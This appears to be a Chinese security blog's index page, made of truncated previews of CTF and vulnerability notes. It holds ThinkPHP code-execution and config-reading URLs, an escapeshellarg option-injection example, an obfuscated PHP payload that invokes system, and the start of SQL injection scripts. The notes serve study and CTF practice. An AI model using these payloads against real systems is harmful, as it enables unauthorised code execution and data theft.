官方公告官方公告:1、https://blog.thinkphp.cn/8690752、https://blog.thinkphp.cn/910675
thinkphp 2http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
thinkphp 5.0.221、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username2、http://192.168.1.1/thinkphp/public/?s=.|t...
Redis介绍REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。
Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。
Redis启动/停止服务
redis-server
开启redis
1234servic...
w3af介绍上手就感觉挺复古的,运行环境用的是python2,很多包都被弃用了还要求安装,可以用docker,docker是个好东西,该框架有三个主要的插件类型:crawl,audit和attack。
crawl经典案例就是爬虫,循环爬取url就完事了
audit翻译过来是审计,就是将crawl发送过来的url进行测试,比如说在url后面加?id=1'
attack利用audit中发现的漏洞进行进一步攻击,在远程服务器上面返回一个shell或者别的
其他插件
Infrastructure
辨识系统信息,比如WAF、操作系统和HTTP daemon
grep
分析其他插件发送过...
知识点PHP数组处理函数
scandir ( string $directory [, int $sorting_order [, resource $context ]] ) : array列出指定路径中的文件和目录,返回一个数组
readfile ( string $filename [, bool $use_include_path = FALSE [, resource $context ]] ) : int读取文件并写入到输出缓冲中(直接输出内容)
file_get_contents ( string $filename [, bool $use_include_...
0x01 前言之所以记录下来是不想再看到相似的题目重新写脚本了,直接用改改数据就好了
0x02 二分法布尔注入123456789101112131415161718192021222324252627282930313233343536373839import urllib.parseimport requestsurl = "http://b55b8d41-e118-469f-b96e-86b3569754ea.node3.buuoj.cn/index.php"#保持sessionsession = requests.session()#定义http的headerh...
命令用法escapeshellcmd简单来说就是将上述字符转义
escapeshellarg简单来说就是将用户输入的字符串包裹上单引号,如果已经有单引号则进行转义
漏洞成因当escapehshellarg将用户输入的字符串包裹上单引号后直接拼接到命令的参数选项位置,而不是参数值位置,比如
1git grep -i --line-number '--open-files-in-pager=id;' master
当这样会导致可以由用户自己加命令选项而不是按照escapeshellarg函数者的本意执行命令
另一个例子:
传入的参数是:172.17.0.2' ...
Handler注入用法:HANDLER...OPEN语句打开一个表,然后用HANDLER...READ读语句,并且读取不会被其他会话共享,最后用HANDLER...CLOSE关表
12345678910HANDLER tbl_name OPEN [ [AS] alias]HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...) [ WHERE where_condition ] [LIMIT ... ]HANDLE...
知识点WEB-INF/web.xml泄露
WEB-INF主要包含一下文件或目录:/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。/WEB-INF/databas...
[强网杯]高明的黑客index.php直接告诉我们源码在www.tar.gz,那就下载来看看好家伙,直接三千多个文件尝试过放到Seay源码审计软件里面自动审计,但是实在是太多了,发现了可能利用的漏洞眼睛也看不过来下面是上网找的多线程脚本,值得学习,记录一下
Python多线程脚本123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354import threadingimport timeimport reimport osimport reques...
SimpleCalculator没有图片,是个计算的页面允许四则运算、丰富的PHP函数SQL注入、XSS、LFI、模板注入都试过了,那只能是RCE(本地代码执行)了,没有思路,后面看writeup才发现大家都有exp,就我没有~
1search=$cos=(is_nan^(6).(4)).(tan^(1).(5));$cos=$$cos;$cos{0}($cos{1})&0=system&1=ls
https://mmbiz.qpic.cn/mmbiz_png/K9JoBxX2CgC...
